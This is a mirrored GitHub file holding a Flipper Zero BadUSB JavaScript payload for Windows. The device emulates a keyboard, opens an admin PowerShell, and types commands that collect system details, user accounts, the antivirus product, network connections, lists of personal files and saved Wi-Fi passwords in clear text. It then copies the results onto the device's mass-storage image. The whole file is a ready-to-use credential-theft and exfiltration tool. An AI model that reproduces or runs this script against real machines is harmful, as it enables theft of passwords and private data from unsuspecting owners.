mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-24 15:30:11 +00:00
85 lines
3.9 KiB
JavaScript
85 lines
3.9 KiB
JavaScript
// Original: [JS Script: BadUSB_Win_Exfil-GSHD.js (By Gas Station Hot Dog)](https://github.com/User84User/User84PublicUser/blob/main/Windows_Exfil-GSHD.js)
|
|
// Updated BadUSB Win Exfil JS Script (By Gas Station Hot Dog & b0r0xZ & mistura.) (Comments added along with more commands)
|
|
//MassStorage Name
|
|
let image = "/ext/apps_assets/mass_storage/test.img";
|
|
//MassStorage Size
|
|
let size = 8 * 1024 * 1024;
|
|
//Le Script
|
|
let script = [
|
|
"$Date = Get-Date -Format yyyy-MM-dd;",//Get Date
|
|
"$Time = Get-Date -Format hh-mm-ss;",//Get Time
|
|
"Get-CimInstance -ClassName Win32_ComputerSystem >> stats.txt;", //Listing computer manufacturer and model
|
|
"Get-LocalUser >> stats.txt;", //List users on the system
|
|
"Get-LocalUser | Where-Object -Property PasswordRequired -Match false >> stats.txt;", //Which users has password required set to false
|
|
"Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct >> stats.txt;", // List which AntiVirus Product is being used
|
|
"Get-CimInstance -ClassName Win32_QuickFixEngineering >> stats.txt;", // Listing installed hotfixes
|
|
"(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\\W+\\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;",//Get network profiles with passwords
|
|
"dir env: >> stats.txt;", //Check ENV
|
|
"Get-Computerinfo >> stats.txt;", //ComputerInfo
|
|
"Get-Service >> stats.txt;", // Get runing services
|
|
"Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;", //Check all IPV4 sufix that is not localhost
|
|
"Get-NetTCPConnection | Where-Object -Property State -Match Listen >> stats.txt;", //List listening ports
|
|
"Get-NetTCPConnection | Select-Object -Property * >> stats.txt;", // Get TCP information, ports, state etc..
|
|
"Get-ChildItem -Path $userDir -Include *.txt, *.doc, *.docx, *.pptx, *.xlsx, *.pdf, *.jpg, *.png, *.mp3, *.mp4, *.zip, *.rar -Recurse >> stats.txt",//Exfil FileNames
|
|
];
|
|
|
|
//Script crawler
|
|
let command = "";
|
|
for (let i = 0; i < script.length; i++) {
|
|
command += script[i];
|
|
}
|
|
|
|
//Requirements
|
|
let badusb = require("badusb");
|
|
let usbdisk = require("usbdisk");
|
|
let storage = require("storage");
|
|
|
|
//Check if MassStorage image Exists...
|
|
print("Checking for Image...");
|
|
if (storage.exists(image)) {
|
|
print ("Storage Exists.");
|
|
}
|
|
//Create MassStorage in case it doesnt exists
|
|
else {
|
|
print ("Creating Storage...");
|
|
usbdisk.createImage(image, size);
|
|
}
|
|
|
|
//VID&PID as HID
|
|
badusb.setup({ vid: 0xAAAA, pid: 0xBBBB, mfr_name: "Flipper", prod_name: "Zero" });
|
|
print("Waiting for connection");
|
|
|
|
//Keep Connected
|
|
while (!badusb.isConnected()) {
|
|
delay(1000);
|
|
}
|
|
|
|
//Program Start!!
|
|
badusb.press("GUI", "x");//Open admin tools menu
|
|
delay(300);
|
|
badusb.press("i");//Select PowerShell
|
|
delay(3000);
|
|
//Uncomment this to work with "Run", also comment the 1st part that works with the admin tools menu
|
|
/*
|
|
badusb.press("GUI", "r");//Open Run
|
|
delay(300);
|
|
badusb.println("powershell");
|
|
badusb.press("ENTER");
|
|
*/
|
|
print("Running payload");
|
|
badusb.println(command, 10);//Run Script Crawler
|
|
badusb.press("ENTER");
|
|
badusb.println("echo 'Please wait until this Window closes to eject the disk!'; Start-Sleep 10; $DriveLetter = Get-Disk -FriendlyName 'Flipper Mass Storage' | Get-Partition | Get-Volume | Select-Object -ExpandProperty DriveLetter; New-Item -ItemType Directory -Force -Path ${DriveLetter}:\\${Date}\\; Move-Item -Path stats.txt -Destination ${DriveLetter}:\\${Date}\\${env:computername}_${Time}.txt; exit")//Find Disk Partition to save
|
|
badusb.press("ENTER");
|
|
badusb.quit();
|
|
delay(2000);
|
|
usbdisk.start(image);//Open MassStorage Folder
|
|
print("Please wait until powershell window closes to eject...");
|
|
|
|
//Ejected check
|
|
while (!usbdisk.wasEjected()) {
|
|
delay(1000);
|
|
}
|
|
//Stop Script
|
|
usbdisk.stop();
|
|
print("Done"); |